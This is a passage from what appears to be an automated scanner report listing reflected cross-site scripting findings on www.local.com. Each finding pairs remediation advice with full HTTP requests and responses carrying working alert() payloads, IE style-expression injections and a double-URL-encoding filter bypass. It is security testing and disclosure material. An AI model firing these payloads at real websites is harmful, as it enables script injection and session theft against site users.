Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8cf3d9"style="x:expression(alert(1))"9c6370ca462;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

4.470. http://www.local.com/dart/ [zone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_1502010015298"><script>alert(1)</script>ffbd7ca082c;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

4.471. http://www.local.com/dart/ [zone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100fc52c';alert(1)//d85ccbd701b;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

4.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92920
Date: Thu, 03 Feb 2011 16:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:57 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=music&8c9e7'-alert(1)-'22f4ee6710f=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

4.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87882
Date: Thu, 03 Feb 2011 16:51:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:17 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

4.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 89105
Date: Thu, 03 Feb 2011 16:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 89105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=sports&66d6b'-alert(1)-'8080df3d42=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

4.475. http://www.local.com/results.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 131999
Date: Thu, 03 Feb 2011 15:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=0tqwfcmc1mz4bv45earm1z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506d27c6";652d94a4b4b&loc=Dallas%2c+TX&kw=banks&uid=a555a31b-b16a-44e4-835f-482623ce13b9&expdate=634349085792409448&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506d27c6%22%253b652d94a4b4b%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:19 GMT; path=/
Set-Cookie: localcom_s=cid=506d27c6";652d94a4b4b&exp=634323183792409448; domain=local.com; expires=Thu, 03-Feb-2011 16:26:19 GMT; path=/
Content-Length: 131999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
prop1="banks";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "506d27c6";652d94a4b4b";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Retail Banks";
s.eVar11="506d27c6";652d94a4b4
...[SNIP]...

4.476. http://www.local.com/results.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 133517
Date: Thu, 03 Feb 2011 15:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; path=/; HttpOnly
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; domain=local.com; expires=Thu, 03-Feb-2011 16:26:17 GMT; path=/
Content-Length: 133517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506c80ba"style="x:expression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.477. http://www.local.com/results.aspx [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131540
Date: Thu, 03 Feb 2011 15:56:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:36 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323183968705455; domain=local.com; expires=Thu, 03-Feb-2011 16:26:36 GMT; path=/
Content-Length: 131540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style="x:expression(alert(1))"fccc9411126&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

